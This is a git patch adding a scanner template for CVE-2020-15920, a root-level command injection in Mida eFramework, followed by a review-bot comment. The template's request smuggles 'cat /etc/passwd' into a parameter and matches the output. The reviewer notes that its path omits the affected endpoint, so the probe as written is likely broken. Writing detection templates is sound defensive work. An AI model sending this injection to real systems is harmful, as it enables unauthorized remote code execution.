From 455a98f771a8a56f80cc83e90fbe1709c293a413 Mon Sep 17 00:00:00 2001
From: Dwi Siswanto
Date: Wed, 2 Sep 2020 01:38:31 +0700
Subject: [PATCH] :fire: Add CVE-2020-15920
---
cves/CVE-2020-15920.yaml | 24 ++++++++++++++++++++++++
1 file changed, 24 insertions(+)
create mode 100644 cves/CVE-2020-15920.yaml
diff --git a/cves/CVE-2020-15920.yaml b/cves/CVE-2020-15920.yaml
new file mode 100644
index 0000000000..55986cde7e
--- /dev/null
+++ b/cves/CVE-2020-15920.yaml
@@ -0,0 +1,24 @@
+id: CVE-2020-15920
+
+info:
+ name: Unauthenticated RCE at Mida eFramework on 'PDC/ajaxreq.php'
+ author: dwisiswant0
+ severity: critical
+ description: There is an OS Command Injection in Mida eFramework through 2.9.0 that allows an attacker to achieve Remote Code Execution (RCE) with administrative (root) privileges. No authentication is required.
+
+ # References:
+ # - https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: regex
+ regex:
+ - "root:[x*]:0:0:"
+ part: body
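Review bot: The `path` entry under `requests` is `{{BaseURL}}/PARAM=…&DIAGNOSIS=PING`, which never names the `PDC/ajaxreq.php` endpoint that `info.name` says is affected and has no `?` before the parameters. As written the probe targets a different URL from the one described, so the `status: 200` and `root:[x*]:0:0:` matchers would most likely never fire and vulnerable hosts would be reported as clean. The path should carry the endpoint, e.g. `- "{{BaseURL}}/PDC/ajaxreq.php?PARAM=…&DIAGNOSIS=PING"` with the existing parameter string unchanged. Because the method is POST, check against the referenced write-up whether the parameters belong in the query string or in a form-encoded `body:` instead.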